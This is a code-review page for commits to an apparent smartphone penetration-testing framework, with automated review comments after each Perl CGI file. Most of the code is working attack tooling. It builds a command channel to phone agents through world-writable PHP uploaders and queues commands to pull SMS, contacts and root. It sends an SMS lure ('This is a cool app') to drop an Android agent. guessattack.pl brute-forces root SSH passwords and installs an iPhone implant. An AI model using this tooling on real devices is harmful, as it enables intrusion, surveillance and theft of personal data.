+ $pictureupload = $fullpath . "/pictureupload.php";
+ $command8 = "touch " . $pictureupload;
+ system($command8);
+ $command9 = "chmod 777 " . $pictureupload;
+ system($command9);
+ $pictureuploadtext = "<?php\n\$base=\$_REQUEST['picture'];\necho \$base;\n\$binary=base64_decode(\$base);\nheader('Content-Type: bitmap; charset=utf-8');\n\$file = fopen('picture.jpg', 'wb');\nfwrite(\$file, \$binary);\nfclose(\$file);\n?>";
+ open(PICFILE, ">",$pictureupload) or die "Couldn't open $pictureupload for writing! ($!)";
+ print PICFILE $pictureuploadtext;
+ close(PICFILE);
+ $textupload = $fullpath . "/textuploader.php";
+ $command10 = "touch " . $textupload;
+ system($command10);
+ $command11 = "chmod 777 " . $textupload;
+ system($command11);
+ $textuploadtext = "<?php\n\$base=\$_REQUEST['text'];\nheader('Content-Type: text; charset=utf-8');\n\$file = fopen('text.txt', 'wb');\nfwrite(\$file, \$base);\n?>";
+ open(TEXTFILE, ">",$textupload) or die "Couldn't open $textupload for writing! ($!)";
+ print TEXTFILE $textuploadtext;
+ close(TEXTFILE);
+ $controlupload = $fullpath . "/controluploader.php";
+ $command12 = "touch " . $controlupload;
+ system($command12);
+ $command13 = "chmod 777 " . $controlupload;
+ system($command13);
+ $controluploadtext = "<?php\n\$base=\$_REQUEST['text'];\nheader('Content-Type: text; charset=utf-8');\n\$file = fopen('control','wb');\nfwrite(\$file, \$base);\n?>";
+ open(CONTROLFILE, ">",$controlupload) or die "Couldn't open $controlupload for writing ($!)";
+ print CONTROLFILE $controluploadtext;
+ close(CONTROLFILE);
+ $putfile = $fullpath . "/putfunc";
+ $command14 = "touch " . $putfile;
+ system($command14);
+ $command15 = "chmod 777 " . $putfile;
+ system($command15);
+ $sql = $dbh->prepare("INSERT INTO agents (id,number,path,controlkey,controlnumber,platform) VALUES (DEFAULT,?,?,?,?,?)");
+ $sql->execute($number1,$path1,$key1,$number21,$platform1);
+ $sql2 = $dbh->prepare("INSERT INTO data (id,sms,contacts,picture,root) VALUES (DEFAULT, NULL, NULL, NULL, NULL)");
+ $sql2->execute();
+ $sql = $dbh->prepare("SELECT id from agents where number=?");
+ $idblah = $sql->execute($number1);
+ @rows = $sql->fetchrow_array();
+ $id = @rows[0];
+ @exec = (qw(perl agentpoll.pl),$path1,$key1,$id);
+ $pid = fork;
+ die "fork failed" unless defined $pid;
+ if ($pid ==0)
+ {
+ open STDIN,'<','/dev/null';
+ open STDOUT,'<','/dev/null';
+ open STDERR,'>&STDOUT';
+ exec {$exec[0]} @exec;
+ }
+
+##----- end of your code
+
+my $url = "menu.pl";
+print "Location: $url\n\n";
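Review bot: `$fullpath = $webserver. $path;` reads `$path`, which this script never sets (the form value is stored in `$path1`), so `$fullpath` is just the web root and `control`, `putfunc`, the data files and the three PHP uploaders are created directly under it instead of in a per-agent directory. `use strict; use warnings;` at the top would have turned this into a compile error; the line presumably should read `$fullpath = $webserver . $path1;`. The generated uploaders write `$_REQUEST` data to disk with no check of the control key, and every file is `chmod 777`, so anything that can reach the web server, or any local account, can overwrite them; tighter modes and a key check in the PHP would narrow that.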
153 frameworkgui/attachMobileModem.pl
@@ -0,0 +1,153 @@
+#!/usr/bin/perl
+BEGIN { use CGI::Carp qw(fatalsToBrowser); };
+use Cwd;
+use DBI;
+use FindBin qw($Bin);
+use lib "$Bin/lib";
+use SPF;
+use CGI ':cgi-lib';
+
+my %FORM = Vars();
+$number = $FORM{"modemPhoneNo"};
+$key = $FORM{"controlKey"};
+$path = $FORM{"appURLPath"};
+
+
+##----- put your code here
+my %Variables = SPF::readconfig();
+my $dbh = SPF::dbconnect(%Variables);
+$Variables{"OS"} = $^O;
+#print "Content-type: text/html\r\n\r\n";
+#print "Connect Smartphone App";
+ $webserver = $Variables{WEBSERVER};
+ $fullpath = $webserver. $path;
+ $type = "app";
+ $number2 = "\"" . $number . "\"";
+ $path2 = "\"" . $path . "\"";
+ $key2 = "\"" . $key . "\"";
+ $type2 = "\"" . $type . "\"";
+ $command1 = "mkdir " . $fullpath;
+ system($command1);
+ $connectfile = $fullpath . "/connect";
+ $command2 = "touch " . $connectfile;
+ system($command2);
+ $command3 = "chmod 777 " . $connectfile;
+ system($command3);
+ $picturefile = $fullpath . "/picture.jpg";
+ $command4 = "touch " . $picturefile;
+ system($command4);
+ $command5 = "chmod 777 " . $picturefile;
+ system($command5);
+ $textfile = $fullpath . "/text.txt";
+ $command6 = "touch " . $textfile;
+ system($command6);
+ $command7 = "chmod 777 " . $textfile;
+ system($command7);
+ $textfile2 = $fullpath . "/text2.txt";
+ $command77 = "touch ". $textfile2;
+ system($command77);
+ $command7777 = "chmod 777 " . $textfile2;
+ system($command7777);
+ $pictureupload = $fullpath . "/pictureupload.php";
+ $command8 = "touch " . $pictureupload;
+ system($command8);
+ $command9 = "chmod 777 " . $pictureupload;
+ system($command9);
+ $pictureuploadtext = "<?php\n\$base=\$_REQUEST['picture'];\necho \$base;\n\$binary=base64_decode(\$base);\nheader('Content-Type: bitmap; charset=utf-8');\n\$file = fopen('picture.jpg', 'wb');\nfwrite(\$file, \$binary);\nfclose(\$file);\n?>";
+ open(PICFILE, ">",$pictureupload) or die "Couldn't open $pictureupload for writing! ($!)";
+ print PICFILE $pictureuploadtext;
+ close(PICFILE);
+ $textupload = $fullpath . "/textuploader.php";
+ $command10 = "touch " . $textupload;
+ system($command10);
+ $command11 = "chmod 777 " . $textupload;
+ system($command11);
+ $textuploadtext = "<?php\n\$base=\$_REQUEST['text'];\nheader('Content-Type: text; charset=utf-8');\n\$file = fopen('text.txt', 'wb');\nfwrite(\$file, \$base);\n?>";
+ open(TEXTFILE, ">",$textupload) or die "Couldn't open $textupload for writing! ($!)";
+ print TEXTFILE $textuploadtext;
+ close(TEXTFILE);
+ $text2upload = $fullpath . "/text2uploader.php";
+ $command100 = "touch " . $text2upload;
+ system($command100);
+ $command110 = "chmod 777 " . $text2upload;
+ system($command110);
+ $text2uploadtext = "<?php\n\$base=\$_REQUEST['text'];\nheader('Content-Type: text; charset=utf-8');\n\$file = fopen('text2.txt', 'wb');\nfwrite(\$file, \$base);\n?>";
+ open(TEXT2FILE, ">",$text2upload) or die "Couldn't open $text2upload for writing! ($!)";
+ print TEXT2FILE $text2uploadtext;
+ close(TEXT2FILE);
+ $connectupload = $fullpath . "/connectuploader.php";
+ $command12 = "touch " . $connectupload;
+ system($command12);
+ $command13 = "chmod 777 " . $connectupload;
+ system($command13);
+ $connectuploadtext = "<?php\n\$base=\$_REQUEST['text'];\nheader('Content-Type: text; charset=utf-8');\n\$file = fopen('connect','wb');\nfwrite(\$file, \$base);\n?>";
+ open(CONNECTFILE, ">",$connectupload) or die "Couldn't open $connectupload for writing! ($!)";
+ print CONNECTFILE $connectuploadtext;
+ close(CONNECTFILE);
+ $getfuncfile = $fullpath . "/getfunc";
+ $command6 = "touch " . $getfuncfile;
+ system($command6);
+ $command7 = "chmod 777 " . $getfuncfile;
+ system($command7);
+ $putfuncfile = $fullpath . "/putfunc";
+ $command6 = "touch " . $putfuncfile;
+ system($command6);
+ $command7 = "chmod 777 " . $putfuncfile;
+ system($command7);
+ $getfuncupload = $fullpath . "/getfuncuploader.php";
+ $command10 = "touch " . $getfuncupload;
+ system($command10);
+ $command11 = "chmod 777 " . $getfuncupload;
+ system($command11);
+ $getfuncuploadtext = "<?php\n\$base=\$_REQUEST['text'];\nheader('Content-Type: text; charset=utf-8');\n\$file = fopen('getfunc', 'wb');\nfwrite(\$file, \$base);\n?>";
+ open(GETFUNCUPLOADFILE, ">",$getfuncupload) or die "Couldn't open $getfuncupload for writing! ($!)";
+ print GETFUNCUPLOADFILE $getfuncuploadtext;
+ close(GETFUNCUPLOADFILE);
+ $putfuncupload = $fullpath . "/putfuncuploader.php";
+ $command10 = "touch " . $putfuncupload;
+ system($command10);
+ $command11 = "chmod 777 " . $putfuncupload;
+ system($command11);
+ $putfuncuploadtext = "<?php\n\$base=\$_REQUEST['text'];\nheader('Content-Type: text; charset=utf-8');\n\$file = fopen('putfunc', 'wb');\nfwrite(\$file, \$base);\n?>";
+ open(PUTFUNCUPLOADFILE, ">",$putfuncupload) or die "Couldn't open $putfuncupload for writing! ($!)";
+ print PUTFUNCUPLOADFILE $putfuncuploadtext;
+ close(PUTFUNCUPLOADFILE);
+ while(1){
+ $fullpath1 = $webserver. $path . "/connect";
+ open(CONNECTFILE, "+<",$fullpath1) or die "Couldn't open $fullpath1 for reading! ($!)";
+;
+ $line= <CONNECTFILE>;
+ $correctstring = $key . " CONNECT";
+ if ($line eq $correctstring)
+ {
+ $command = "\n" . $key . " CONNECTED";
+ print CONNECTFILE $command;
+ close(CONNECTFILE);
+ # print "CONNECTED!\n";
+ last;
+ }
+ else {
+ close(CONNECTFILE);
+ # sleep(1);
+ }
+ }
+ $modemtype = "app";
+ $sql = $dbh->prepare("INSERT INTO modems (id,number,path,controlkey,type) VALUES (DEFAULT,?,?,?,?)");
+ $sql->execute($number,$path,$key,$modemtype);
+ @exec = (qw(perl poller.pl),$path,$key);
+ $pid = fork;
+ die "fork failed" unless defined $pid;
+ if ($pid ==0)
+ {
+ open STDIN,'<','/dev/null';
+ open STDOUT,'<','/dev/null';
+ open STDERR,'>&STDOUT';
+ exec {$exec[0]} @exec;
+ }
+
+
+
+##----- end of your code
+
+my $url = "menu.pl";
+print "Location: $url\n\n";
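Review bot: The `while(1)` loop that waits for the `connect` file re-opens and re-reads it with the `sleep(1)` commented out and no upper bound, so the CGI request pins a CPU and never returns if the handshake string is never written. The comparison `$line eq $correctstring` would also fail if the file ends in a newline, since `$line` is not chomped. Restoring the delay and adding a deadline, e.g. `last if time - $start > $timeout;` with both variables set before the loop, lets the handler give up and report the failure. The quoted copies `$number2`, `$path2`, `$key2` and `$type2` are built but never used.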
BIN  frameworkgui/bulb.jpg
21 frameworkgui/config
@@ -0,0 +1,21 @@
+#SMARTPHONE PENTEST FRAMEWORK CONFIG FILE
+#ROOT DIRECTORY FOR THE WEBSERVER THAT WILL HOST OUR FILES
+WEBSERVER = /var/www
+#IPADDRESS FOR WEBSERVER (webserver needs to be listening on this address)
+IPADDRESS = 192.168.1.12
+#IP ADDRESS TO LISTEN ON FOR SHELLS
+SHELLIPADDRESS = 192.168.1.12
+#IP ADDRESS OF SQLSERVER 127.0.0.1 IF LOCALHOST
+MYSQLSERVER = 127.0.0.1
+#DATABASE TYPE (Mysql of Postgresql)
+DATABASETYPE = mysql
+#USERNAME OF THE MYSQL USER TO USE
+MYSQLUSER = root
+#PASSWORD OF THE MYSQL USER TO USE
+MYSQLPASS = toor
+#PORT MYSQL IS RUNNING ON (3306 IS DEFAULT)
+MYSQLPORT = 3306
+#LOCATION OF ANDROID APK FOR AGENT DROP
+ANDROIDAGENT = /var/www/frameworkgui/AndroidAgent.apk
+#LOCATION OF IPHONE DEB FOR AGENT DROP
+IPHONEAGENT = /var/www/frameworkgui/iphone.deb
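Review bot: The committed defaults `MYSQLUSER = root` / `MYSQLPASS = toor` put a database superuser credential into a file that, judging by the `ANDROIDAGENT = /var/www/frameworkgui/...` path, probably sits in the same web-served directory as the CGI scripts and may therefore be retrievable over HTTP. Ship placeholders instead (for example `MYSQLPASS = CHANGE_ME`), use a dedicated low-privilege account for the `framework` database, and keep the file outside the document root or deny access to it in the web server configuration. The `DATABASETYPE` comment should also name the literal values the scripts compare against, e.g. `#DATABASE TYPE (mysql or postgres)`.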
61 frameworkgui/createDatabase.pl
@@ -0,0 +1,61 @@
+#!/usr/bin/perl
+use DBI;
+use Cwd;
+use FindBin qw($Bin);
+use lib "$Bin/lib";
+use SPF;
+my %Variables = SPF::readconfig();
+my $dbh = SPF::dbconnect(%Variables);
+$Variables{"OS"} = $^O;
+
+ $type = $Variables{"DATABASETYPE"};
+
+ $dropquery1 = "DROP TABLE IF EXISTS agents";
+ $dropquery2 = "DROP TABLE IF EXISTS data";
+ $dropquery3 = "DROP TABLE IF EXISTS modems";
+ $dropquery4 = "DROP TABLE IF EXISTS remote";
+ $dropquery5 = "DROP TABLE IF EXISTS client";
+ if ($type eq "postgres")
+ {
+ $createquery1 = "create table agents (id SERIAL NOT NULL PRIMARY KEY, number varchar(12),path varchar(1000), controlkey varchar(7), controlnumber varchar(12), platform varchar(12))"
+;
+ $createquery2 = "create table data (id SERIAL NOT NULL PRIMARY KEY, sms varchar(2000),contacts varchar(1000), picture varchar(100), root varchar(5))";
+ $createquery3 = "create table modems (id SERIAL NOT NULL PRIMARY KEY, number varchar(12), path varchar(1000), controlkey varchar(7), type varchar(3))";
+ $createquery4 = "create table remote (id SERIAL NOT NULL PRIMARY KEY, ip varchar(15), exploit varchar(200), vuln varchar(3), agent varchar(3))";
+ $createquery5 = "create table client (id SERIAL NOT NULL PRIMARY KEY, number varchar(12), exploit varchar(200), vuln varchar(3))";
+
+ }
+ elsif ($type eq "mysql")
+ {
+ $createquery1 = "create table agents (id INT NOT NULL AUTO_INCREMENT PRIMARY KEY, number varchar(12),path varchar(1000), controlkey varchar(7), controlnumber varchar(12), platform varchar(12))";
+ $createquery2 = "create table data (id INT NOT NULL AUTO_INCREMENT PRIMARY KEY, sms varchar(2000),contacts varchar(1000), picture varchar(100), root varchar(5))";
+ $createquery3 = "create table modems (id INT NOT NULL AUTO_INCREMENT PRIMARY KEY, number varchar(12), path varchar(1000), controlkey varchar(7), type varchar(3))";
+ $createquery4 = "create table remote (id INT NOT NULL AUTO_INCREMENT PRIMARY KEY, ip varchar(15), exploit varchar(200), vuln varchar(3), agent varchar(3))";
+ $createquery5 = "create table client (id INT NOT NULL AUTO_INCREMENT PRIMARY KEY, number varchar(12), exploit varchar(200), vuln varchar(3))";
+ }
+
+ $sql = $dbh->prepare($dropquery1);
+ $sql->execute;
+ $sql = $dbh->prepare($dropquery2);
+ $sql->execute;
+ $sql = $dbh->prepare($dropquery3);
+ $sql->execute;
+ $sql = $dbh->prepare($dropquery4);
+ $sql->execute;
+ $sql = $dbh->prepare($dropquery5);
+ $sql->execute;
+ $sql = $dbh->prepare($createquery1);
+ $sql->execute;
+ $sql = $dbh->prepare($createquery2);
+ $sql->execute;
+ $sql = $dbh->prepare($createquery3);
+ $sql->execute;
+ $sql = $dbh->prepare($createquery4);
+ $sql->execute;
+ $sql = $dbh->prepare($createquery5);
+ $sql->execute;
+#####This sends it back to the main page.
+
+my $url = "menu.pl";
+print "Location: $url\n\n";
+
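Review bot: When `DATABASETYPE` is neither `postgres` nor `mysql`, the `if`/`elsif` leaves `$createquery1` to `$createquery5` undefined, yet the five `DROP TABLE IF EXISTS` statements still run, so a config typo destroys the data and recreates nothing. Add `else { die "Unsupported DATABASETYPE: $type"; }` after the `elsif` block so the script stops before the drops. The wipe also runs for any request that reaches this script, since the only confirmation is the client-side `confirm()` in menu.pl; a server-side check (POST only, plus an explicit confirmation parameter) would be worth adding. None of the `execute` calls is checked, so either enable `RaiseError` on the handle or append `or die $dbh->errstr`.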
45 frameworkgui/directdownload.pl
@@ -0,0 +1,45 @@
+#!/usr/bin/perl
+use Cwd;
+use DBI;
+use FindBin qw($Bin);
+use lib "$Bin/lib";
+use SPF;
+my %Variables = SPF::readconfig();
+my $dbh = SPF::dbconnect(%Variables);
+$webserver = $Variables{"WEBSERVER"};
+ $ipaddress = $Variables{"IPADDRESS"};
+$path = $ARGV[0];
+ $filename = $ARGV[1];
+ $number = $ARGV[2];
+$platform = $ARGV[3];
+$modem = $ARGV[4];
+chomp($platform);
+if ($platform eq "android")
+{
+$link = "http://" . $ipaddress . $path . $filename;
+ $fullpath = $webserver. $path;
+ $command1 = "mkdir " . $fullpath;
+ system($command1);
+ $location = $Variables{"ANDROIDAGENT"};
+
+ $command = "cp " . $location . " " . $webserver . $path . $filename;
+ system($command);
+
+
+
+ $sql = $dbh->prepare("SELECT path from modems where id=?");
+ $results = $sql->execute($modem);
+ @rows = $sql->fetchrow_array();
+ $path2 = @rows[0];
+
+ $sql = $dbh->prepare("SELECT controlkey from modems where id=?");
+ $results2 = $sql->execute($modem);
+ @rows = $sql->fetchrow_array();
+ $key2 = @rows[0];
+
+ $control = $webserver . $path2 . "/getfunc";
+ open(CONTROLFILE, ">",$control) or die "Couldn't open $control for writing ($!)";
+ $command2 = $key2 . " " . "SEND" . " " . $number . " " . "This is a cool app: " . $link;
+ print CONTROLFILE $command2;
+ close(CONTROLFILE);
+}
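Review bot: `$path` and `$filename` come straight from `@ARGV` and are concatenated into shell strings for `system($command1)` and `system($command)`, so shell metacharacters in them are interpreted by the shell and `..` segments can move the target outside `$webserver`. Use the list form, `system("mkdir", $fullpath);` and `system("cp", $location, $fullpath . $filename);`, and reject values that fail an anchored allow-list pattern (and any containing `..`) before a path is built. The caller is not visible in this hunk, but if these arguments originate from the `hostingPath` and `fileName` form fields in menu.pl they are client-controlled. `@rows[0]` should be `$rows[0]`, and the two modem queries can be one `SELECT path, controlkey FROM modems WHERE id=?`.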
65 frameworkgui/escalatePrivileges.pl
@@ -0,0 +1,65 @@
+#!/usr/bin/perl
+BEGIN { use CGI::Carp qw(fatalsToBrowser); };
+use Cwd;
+use DBI;
+use FindBin qw($Bin);
+use lib "$Bin/lib";
+use SPF;
+use CGI ':cgi-lib';
+
+my %FORM = Vars();
+$agent = $FORM{"agentsDD"};
+$delivery = $FORM{"deliveryMethodRB"};
+$modemNo = $FORM{"modemNoDD"};
+
+
+
+
+
+##----- put your code here
+my %Variables = SPF::readconfig();
+my $dbh = SPF::dbconnect(%Variables);
+#print "Content-type: text/html\r\n\r\n";
+$webserver = $Variables{"WEBSERVER"};
+
+$Variables{"OS"} = $^O;
+ $sql = $dbh->prepare("SELECT path from agents where number=?");
+ $results = $sql->execute($agent);
+ @rows = $sql->fetchrow_array();
+ $path = @rows[0];
+
+ $sql = $dbh->prepare("SELECT controlkey from agents where number=?");
+ $results = $sql->execute($agent);
+ @rows = $sql->fetchrow_array();
+ $key = @rows[0];
+if ($delivery eq "HTTP")
+ {
+ $command = $key . " ROOT HTTP\n";
+ $control = $webserver . $path . "/putfunc";
+ open(CONTROLFILE, ">>",$control) or die "Couldn't open $control for appending! ($!)";
+ print CONTROLFILE $command;
+ close(CONTROLFILE);
+
+ }
+ if ($delivery eq "SMS")
+ {
+
+ $sql = $dbh->prepare("SELECT id from modems where number=?");
+ $results = $sql->execute($modemNo);
+ @rows = $sql->fetchrow_array();
+ $modem = @rows[0];
+ $command = $key . " " . "ROOT HTTP" . " " . $modem . "\n";
+ $control = $webserver . $path . "/putfunc";
+ open(CONTROLFILE, ">>",$control) or die "Couldn't open $control for appending! ($!)";
+ print CONTROLFILE $command;
+ close(CONTROLFILE);
+
+}
+##----- end of your code
+
+my $url = "menu.pl";
+print "Location: $url\n\n";
+
+
+
+
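Review bot: `use CGI::Carp qw(fatalsToBrowser)` at the top sends every `die` text to the HTTP client, and the `open ... or die "Couldn't open $control for appending! ($!)"` messages in this file embed the full server-side path built from `$webserver` and `$path`. Keep the detail in the server log and return a generic error page, i.e. drop `fatalsToBrowser` outside development. The same import appears in getContacts.pl, getDatabase.pl, guessPassword.pl and menu.pl in this commit.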
108 frameworkgui/getContacts.pl
@@ -0,0 +1,108 @@
+#!/usr/bin/perl
+BEGIN { use CGI::Carp qw(fatalsToBrowser); };
+use DBI;
+use Cwd;
+use FindBin qw($Bin);
+use lib "$Bin/lib";
+use SPF;
+use CGI ':cgi-lib';
+
+my %FORM = Vars();
+$agent = $FORM{"agentsDD"};
+$deliverymethod = $FORM{"deliveryMethodRB"};
+$returnmethod = $FORM{"returnMethodRB"};
+$modemNo = $FORM{"modemNoDD"};
+
+
+
+##----- put your code here
+my %Variables = SPF::readconfig();
+my $dbh = SPF::dbconnect(%Variables);
+#print "Content-type: text/html\r\n\r\n";
+$webserver = $Variables{"WEBSERVER"};
+
+$Variables{"OS"} = $^O;
+ $sql = $dbh->prepare("SELECT path from agents where number=?");
+ $results = $sql->execute($agent);
+ @rows = $sql->fetchrow_array();
+ $path = @rows[0];
+
+ $sql = $dbh->prepare("SELECT controlkey from agents where number=?");
+ $results = $sql->execute($agent);
+ @rows = $sql->fetchrow_array();
+ $key = @rows[0];
+if ($returnmethod eq "SMS")
+ {
+
+ $sql = $dbh->prepare("SELECT id from modems where number=?");
+ $results = $sql->execute($modemNo);
+ @rows = $sql->fetchrow_array();
+ $modem = @rows[0];
+
+ if ($deliverymethod eq "HTTP")
+ {
+ $command = $key . " CONT " . $deliverymethod . " " . $returnmethod . " " . $modem . "\n";
+ $control = $webserver . $path . "/putfunc";
+ open(CONTROLFILE, ">>",$control) or die "Couldn't open $control for appending! ($!)";
+ print CONTROLFILE $command;
+ close(CONTROLFILE);
+
+
+
+ }
+ if ($deliverymethod eq "SMS")
+ {
+ $sql = $dbh->prepare("SELECT id from modems where number=?");
+ $results = $sql->execute($modemNo);
+ @rows = $sql->fetchrow_array();
+ $modem = @rows[0];
+ $command = $key . " CONT " . $deliverymethod . " " . $returnmethod . " " . $modem . "\n";
+ $control = $webserver . $path . "/putfunc";
+ open(CONTROLFILE, ">>",$control) or die "Couldn't open $control for appending! ($!)";
+ print CONTROLFILE $command;
+ close(CONTROLFILE);
+
+ }
+ }
+
+
+ if ($returnmethod eq "HTTP")
+ {
+
+ if ($deliverymethod eq "HTTP")
+ {
+ $command = $key . " CONT " . $deliverymethod . " " . $returnmethod . "\n";
+ $control = $webserver . $path . "/putfunc";
+ open(CONTROLFILE, ">>",$control) or die "Couldn't open $control for appending! ($!)";
+ print CONTROLFILE $command;
+ close(CONTROLFILE);
+
+
+ }
+ if ($deliverymethod eq "SMS")
+ {
+
+ $sql = $dbh->prepare("SELECT id from modems where number=?");
+ $results = $sql->execute($modemNo);
+ @rows = $sql->fetchrow_array();
+ $modem = @rows[0];
+ $command = $key . " CONT " . $deliverymethod . " " . $returnmethod . " " . $modem . "\n";
+ $control = $webserver . $path . "/putfunc";
+ open(CONTROLFILE, ">>",$control) or die "Couldn't open $control for appending! ($!)";
+ print CONTROLFILE $command;
+ close(CONTROLFILE);
+
+
+
+ }
+
+ }
+
+
+
+
+##----- end of your code
+
+my $url = "menu.pl";
+print "Location: $url\n\n";
+
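Review bot: Neither agent lookup checks that a row came back, so for an unknown `agentsDD` value `$path` and `$key` are undefined and the script appends a command line with an empty key to `$webserver . "/putfunc"`. Fetch both columns in one statement and stop on a miss, e.g. `my ($path, $key) = $dbh->selectrow_array("SELECT path, controlkey FROM agents WHERE number=?", undef, $agent);` followed by `die "unknown agent" unless defined $path && defined $key;`. The modem lookup keyed on `modemNoDD` has the same gap, and the same pattern is in escalatePrivileges.pl, getDatabase.pl and directdownload.pl. The inner `$deliverymethod eq "SMS"` branch also repeats the modem query that already ran at the top of the `$returnmethod eq "SMS"` block.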
94 frameworkgui/getDatabase.pl
@@ -0,0 +1,94 @@
+#!/usr/bin/perl
+BEGIN { use CGI::Carp qw(fatalsToBrowser); };
+use DBI;
+use Cwd;
+use FindBin qw($Bin);
+use lib "$Bin/lib";
+use SPF;
+use CGI ':cgi-lib';
+
+my %FORM = Vars();
+$agent = $FORM{"agentsDD"};
+$deliverymethod = $FORM{"deliveryMethodRB"};
+$returnmethod = $FORM{"returnMethodRB"};
+$modemNo = $FORM{"modemNoDD"};
+
+
+
+##----- put your code here
+my %Variables = SPF::readconfig();
+my $dbh = SPF::dbconnect(%Variables);
+#print "Content-type: text/html\r\n\r\n";
+$webserver = $Variables{"WEBSERVER"};
+
+$Variables{"OS"} = $^O;
+ $sql = $dbh->prepare("SELECT path from agents where number=?");
+ $results = $sql->execute($agent);
+ @rows = $sql->fetchrow_array();
+ $path = @rows[0];
+
+ $sql = $dbh->prepare("SELECT controlkey from agents where number=?");
+ $results = $sql->execute($agent);
+ @rows = $sql->fetchrow_array();
+ $key = @rows[0];
+
+if ($returnmethod eq "SMS")
+ {
+ $sql = $dbh->prepare("SELECT id from modems where number=?");
+ $results = $sql->execute($modemNo);
+ @rows = $sql->fetchrow_array();
+ $modem = @rows[0];
+ $command = $key . " " . "SMSS" . " " . $deliverymethod . " " . $returnmethod . " " . $modem . "\n";
+ if ($deliverymethod eq "HTTP")
+ {
+ $control = $webserver . $path . "/putfunc";
+ open(CONTROLFILE, ">>",$control) or die "Couldn't open $control for appending! ($!)";
+ print CONTROLFILE $command;
+ close(CONTROLFILE);
+
+
+ }
+ if ($deliverymethod eq "SMS")
+ {
+ $control = $webserver . $path . "/putfunc";
+ open(CONTROLFILE, ">>",$control) or die "Couldn't open $control for appending! ($!)";
+ print CONTROLFILE $command;
+ close(CONTROLFILE);
+
+ }
+
+
+ }
+ if ($returnmethod eq "HTTP")
+ {
+ if ($deliverymethod eq "HTTP")
+ {
+ $command = $key . " SMSS " . $deliverymethod . " " . $returnmethod . "\n";
+ $control = $webserver . $path . "/putfunc";
+ open(CONTROLFILE, ">>",$control) or die "Couldn't open $control for appending! ($!)";
+ print CONTROLFILE $command;
+ close(CONTROLFILE);
+
+ }
+ if ($deliverymethod eq "SMS")
+ {
+ $sql = $dbh->prepare("SELECT id from modems where number=?");
+ $results = $sql->execute($modemNo);
+ @rows = $sql->fetchrow_array();
+ $modem = @rows[0];
+ $command = $key . " SMSS " . $deliverymethod . " " . $returnmethod . " " . $modem . "\n";
+ $control = $webserver . $path . "/putfunc";
+ open(CONTROLFILE, ">>",$control) or die "Couldn't open $control for appending! ($!)";
+ print CONTROLFILE $command;
+ close(CONTROLFILE);
+
+
+}
+}
+
+##----- end of your code
+
+my $url = "menu.pl";
+print "Location: $url\n\n";
+
+
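Review bot: In the `$returnmethod eq "SMS"` block the two `$deliverymethod` branches are identical line for line, and across the whole script the four branches differ only in whether `$modem` is appended to `$command`. Build `$command` once, then do a single write guarded by `if ($deliverymethod eq "HTTP" or $deliverymethod eq "SMS")`, using a lexical handle: `open(my $ctl, ">>", $control) or die "Couldn't open $control for appending! ($!)";`. If several requests can append to the same `putfunc` file at once (not determinable from this hunk), taking `flock($ctl, LOCK_EX)` before the `print` would keep command lines from interleaving.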
33 frameworkgui/guessPassword.pl
@@ -0,0 +1,33 @@
+#!/usr/bin/perl
+BEGIN { use CGI::Carp qw(fatalsToBrowser); };
+use DBI;
+use Cwd;
+use FindBin qw($Bin);
+use lib "$Bin/lib";
+use SPF;
+my %Variables = SPF::readconfig();
+use CGI ':cgi-lib';
+
+my %FORM = Vars();
+$ipAddress = $FORM{"ipAddressTB"};
+$passwordFile = $FORM{"passwordFileTB"};
+
+
+##----- put your code here
+
+my @exec = (qw(perl guessattack.pl),$ipAddress,$passwordFile);
+$pid = fork;
+die "fork failed" unless defined $pid;
+if ($pid ==0) {
+ open STDIN,'<','/dev/null';
+ open STDOUT,'<','/dev/null';
+ open STDERR,'>&STDOUT';
+ exec {$exec[0]} @exec;
+}
+
+
+
+##----- end of your code
+
+my $url = "menu.pl";
+print "Location: $url\n\n";
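Review bot: `ipAddressTB` and `passwordFileTB` are taken from the request and handed to the child process without validation, so any client that can reach this CGI chooses which local file the server-side script opens and which host it contacts. Validate both before the `fork`, for example `die "bad address" unless $ipAddress =~ /\A\d{1,3}(?:\.\d{1,3}){3}\z/;`, and resolve `$passwordFile` against a fixed directory of operator-supplied lists instead of accepting a free path. In the child, `open STDOUT,'<','/dev/null'` opens the handle for reading and should use `'>'`. `exec` has no failure path, so on error the child falls through and emits the redirect as well; append `or exit 1`.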
66 frameworkgui/guessattack.pl
@@ -0,0 +1,66 @@
+#!/usr/bin/perl
+use Cwd;
+use DBI;
+use Expect;
+use FindBin qw($Bin);
+use lib "$Bin/lib";
+use SPF;
+
+my %Variables = SPF::readconfig();
+my $dbh = SPF::dbconnect(%Variables);
+$Variables{"OS"} = $^O;
+$ipaddress = $ARGV[0];
+$passfile = $ARGV[1];
+ $vulnerable = "no";
+ $agent = "no";
+ $command = 'sftp';
+ $param = "root@" . $ipaddress;
+ $timeout = 10;
+ $notfound = "ssh: connect to host " . $ipaddress . " port 22: Connection refused";
+ $passwordstring = $parm . "'s password: ";
+ $location = $Variables{"IPHONEAGENT"};
+ $putfile = $location;
+ $connectstring = "Connecting to " . $ipaddress . "...";
+ $installcommand = "dpkg -i " . "iphone.deb" . "\n";
+ $guesspassword = "null";
+ open(READFILE, "<",$passfile) or die "Couldn't open $passfile for reading! ($!)";
+ while(<READFILE>)
+ {
+ $guess = $_;
+ $guess2 = $guess . "\n";
+ $exp = Expect->spawn($command, $param) or die "Cannot spawm sftp command";
+ $exp->expect($timeout,[$connectstring]);
+ $exp->expect($timeout,["Are you sure you want to continue connecting (yes/no)?", sub {my $self = shift; $self->send("yes\n");}]); #[$notfound, return]);
+ $exp->expect($timeout, $passwordstring);
+ $exp->send($guess2);
+ if ($exp->expect($timeout, ["sftp>"]))
+ {
+ $vulnerable="yes";
+ $guesspassword = $guess;
+ $exp->send("put $putfile\n");
+ $exp->expect($timeout, ["sftp>"]);
+ $exp->send("bye\n");
+ $command2 = "ssh";
+ $exp = Expect->spawn($command2, $param);
+ $exp->expect($timeout, $passwordstring);
+ $exp->send($guess2);
+ $exp->expect($timeout, [qr'root\s*']);
+ $exp->send($installcommand);
+ $exp->expect($timeout, "Setting up com.bulbsecurity.tooltest (0.0.1-23) ...");
+ $exp->send("tooltest\n");
+ if($exp->expect($timeout,["Smartphone Pentest Framework Agent"]))
+ {
+ $agent="yes";
+ }
+ $exp->send("exit");
+ $exp->soft_close();
+ last;
+ }
+ }
+ close READFILE;
+ $guessstring = "Guess: " . $guesspassword;
+ $sql = $dbh->prepare("INSERT INTO remote (id,ip,exploit,vuln,agent) VALUES (DEFAULT,?,?,?,?)");
+ $sql->execute($ipaddress,$guessstring,$vulnerable,$agent);
+
+
+
